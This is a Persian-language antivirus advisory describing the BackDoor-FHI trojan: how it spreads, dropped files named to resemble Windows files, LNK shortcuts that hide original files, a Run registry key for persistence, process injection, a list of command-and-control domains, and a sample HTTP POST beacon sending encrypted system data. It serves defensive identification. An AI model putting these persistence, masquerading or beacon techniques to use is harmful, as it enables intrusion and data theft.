انتشار ويروس BackDoor-FHI نيز همانند ساير اسب های تروا با دريافت آن از اينترنت و اجرا بر روی دستگاه صورت می پذيرد. هرزنامه هايی که سعی می کنند که کاربر را تشويق به دريافت اين اسب تروا کنند، کانالهای IRC، پوشه های به اشتراک گذاشته شده (Shared) در شبکه های نقطه به نقطه و گروه های خبري، همگی بسترهای مناسبی برای انتشار اين اسب تروا هستند.
%UserProfile%\Application Data\[random]\[random].exe
همچنین نسخه هایی از ویروس در مسیر های گوناگون برروی دستگاه با نام زیر کپی می شوند:
thumbs.db[random character]
همچنین فایل های مخرب زیر در سیستم تولید می شوند که حاوی داده های مورد استفاده بدافزار می باشند:
$ReChCLE.BIN [malware data file]
readme.tat [malware data file]
reYdme.tat [malware data file]
thLmbs.db
desktopfini [malware data file]
vagefile.sys [malware data file]
همانگونه که مشاهده می شود بسیاری از نامهای بالا شباهتهایی با نام فایلهای آشنا در سیستم عامل Windows دارند. مثلا فایل Desktop.ini که شکل نمایش شاخه را در پنجره Explorer.exe نشان میدهد یا فایل Thumbs.db که حاوی پیش نمایش (Preview) از تصاویر و فیلمهای موجود در هر شاخه می باشد.
یکی از آسیب های مهم این ویروس ساختن میانبرهایی (یا shortcut بصورت فایل هایی با پسوند LNK) همنام با فایل ها و یا پوشه های موجود بر روی سیستم می باشد که با پسوند های زیر ساخته می شوند؛ پس از ساخته شدن میانبر در یک مسیر ممکن است از هر فایل یا پوشه ۲ عدد موجود می باشد که همنام هستند و یکی فایل و پوشه ی اصلی و دیگری میانبر ساخته شده توسط ویروس می باشد که فایل یا پوشه ی اصلی به صورت مخفی (Hidden) می باشد.
- xls
- doc
- mp3
- ppt
- dll
- db
به عبارت دیگر در هر صورت میانبر ساخته شده به فایل های مخرب ویروس اشاره می کند و همین دوگانگی یعنی وجود همزمان دو فایل با نامهای یکسان می تواند کاربر را به آلوده بودن دستگاه متوجه سازد.
با اضافه شدن مدخل زیر در محضرخانه ی سیستم آلوده، فایل مخرب ویروس [random].exe با هر بار راه اندازی مجدد سیستم به صورت خودکار اجرا خواهد شد:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
“{8DF9EE17-84FF-E9C9-901F-18FC59A5DB1E}” = %UserProfile%\Application Data\[Random]\ [random].exe /r
اسب تروای BackDoor-FHI کد مخرب خود را در بسیاری از پروسه های سیستمی تزریق می نماید تا با اجرای پروسه ها کد مخرب نیز اجرا شود.
در پشتی که توسط ویروس باز می شود تلاش می کند به نشانی های زیر وصل شود (این نشانی ها ممکن است براساس منطقه ی جغرافیایی که ویروس در آن اجرا می شود تغییر کنند):
- www.guard.su
- www.protection.su
- www.e-statics.cc
- somesytems.cc
- www-protection.su
- estore-main.su
- strong-services.su
- wprotections.su
- wguards.su
در صورت موفقیت ارتباط ویروس با نشانی های بالا ممکن است اطلاعات رمزنگاری شده ی سیستمی برای سایت ها ارسال شود. این اطلاعات به صورت زیر می باشد:
POST /ping.html HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)
Host: e-statistics.cc
Content-Length: 9948
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
z=P8lvsmpmwVyY7lLJAnK60TUizGDXSdB9PCBKdUVwmflUQl6nsv5IIm7uuT7o7h …
از دیگر آسیب های این ویروس دریافت دیگر ویروس ها و بدافزار ها و اجرای آنها بر روی سیستم آلوده می باشد. همچنین بعضی از نسخه های این ویروس عمکرد Rootkit داشته و با استفاده از این قابلیت می تواند فایل ها و پروسه های خود را از دسترس کاربر و برنامه ها مخفی نگاه دارد.
موسسه نرم افزاری ترسیم رایانه شرق